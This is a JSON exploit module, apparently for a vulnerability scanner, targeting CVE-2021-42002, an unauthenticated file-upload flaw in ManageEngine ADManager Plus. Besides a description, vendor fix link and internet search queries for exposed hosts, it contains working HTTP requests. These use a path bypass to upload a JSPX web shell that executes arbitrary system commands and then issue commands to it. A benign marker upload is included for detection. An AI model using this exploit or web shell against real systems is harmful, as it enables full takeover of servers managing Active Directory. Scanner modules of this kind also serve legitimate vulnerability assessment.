{
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is&nbsp;</span>an Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button.<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus &lt;7114 contains a filter bypass leading to file-upload remote code execution; this&nbsp;<span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed in version&nbsp;</span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
"Product": "ManageEngine ADManager Plus",
"Homepage": "https://www.manageengine.com/",
"DisclosureDate": "2021-11-11",
"Author": "Flip_FI",
"FofaQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
"GobyQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
"Level": "3",
"Impact": "<p>An attacker can bypass the permission check and directly upload a malicious JSPX file, then remotely execute arbitrary system commands to gain control of the server, which is a severe risk.<br></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a fix; please update promptly:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
"References": [
"https://www.manageengine.com/products/ad-manager/release-notes.html#7115"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
"follow_redirect": false,
"header": {
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
},
"data_type": "text",
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tout.println(\"c4ca4238a0b923820dcc509a6f75849b\");\n\t]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "SUCCESS",
"bz": ""
}
]
},
"SetVariable": [
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
]
},
{
"Request": {
"method": "GET",
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "c4ca4238a0b923820dcc509a6f75849b",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
},
"data_type": "text",
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tString cmd = pageContext.getRequest().getParameter(\"cmd\");\n\tif (cmd != null&&!\"\".equals(cmd)) {\n\ttry{\n\t\tProcess p = Runtime.getRuntime().exec(cmd);\n\t\tInputStream in = p.getInputStream();\n\t\tBufferedReader br = new BufferedReader(new InputStreamReader(in,\"GBK\"));\n\t\tString brs = br.readLine();\n\t\twhile(brs!=null){\n\t\t\tout.println(brs+\"</br>\");\n\t\t\tbrs = br.readLine();\n\t\t}\n\t\t}catch(Exception ex){\n\t\t\tout.println(ex.toString());\n\t\t}\n\t}]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "SUCCESS",
"bz": ""
}
]
},
"SetVariable": [
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
]
},
{
"Request": {
"method": "POST",
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "cmd={{{cmd}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|([\\w\\W]+)"
]
}
],
"Tags": [
"Code Execution",
"File Upload"
],
"VulType": [
"Code Execution",
"File Upload"
],
"CVEIDs": [
"CVE-2021-42002"
],
"CNNVD": [
"CNNVD-202111-1073"
],
"CNVD": [
"CNVD-2021-88234"
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "ManageEngine ADManager Plus 任意文件上传漏洞(CVE-2021-42002)",
"Product": "ManageEngine ADManager Plus",
"Description": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus 是Zoho公司开发的</span>一个 Active Directory (AD) 管理和报告解决方案,它允许 IT 管理员和技术人员轻松管理 AD 对象并单击按钮生成即时报告!</p><p><span style=\"color: var(--primaryFont-color);\">ManageEngine ADManager Plus &lt;= 7114 存在权限绕过漏洞导致未授权用户允许上传JSPX文件至网站目录达到任意代码执行目的。</span></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">厂商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span><br></p>",
"Impact": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(22, 51, 102);\">攻击者通过权限绕过直接上传木马jspx文件可远程执行任意系统命令获取服务器权限风险极大</span></span></p>",
"VulType": [
"代码执行",
"文件上传"
],
"Tags": [
"代码执行",
"文件上传"
]
},
"EN": {
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
"Product": "ManageEngine ADManager Plus",
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is&nbsp;</span>an Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button.<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus &lt;7114 contains a filter bypass leading to file-upload remote code execution; this&nbsp;<span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed in version&nbsp;</span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a fix; please update promptly:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
"Impact": "<p>An attacker can bypass the permission check and directly upload a malicious JSPX file, then remotely execute arbitrary system commands to gain control of the server, which is a severe risk.<br></p>",
"VulType": [
"Code Execution",
"File Upload"
],
"Tags": [
"Code Execution",
"File Upload"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}